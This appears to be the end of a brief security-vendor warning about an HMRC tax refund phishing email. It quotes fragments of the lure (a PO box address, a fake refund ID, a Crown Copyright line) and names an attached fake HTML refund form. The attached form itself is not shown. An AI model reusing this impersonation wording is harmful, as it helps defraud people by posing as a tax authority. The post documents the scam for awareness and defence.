PO Box 1970
Liverpool
L75 1WX

TAX REFUND ID: UK381716209-HMRC

? Crown Copyright, HM Revenue & Customs
Attached to the email is a html file:
Refund_Form.html

The fake html phishing site looks like this...






Cheers,

Steve
Sanesecurity.com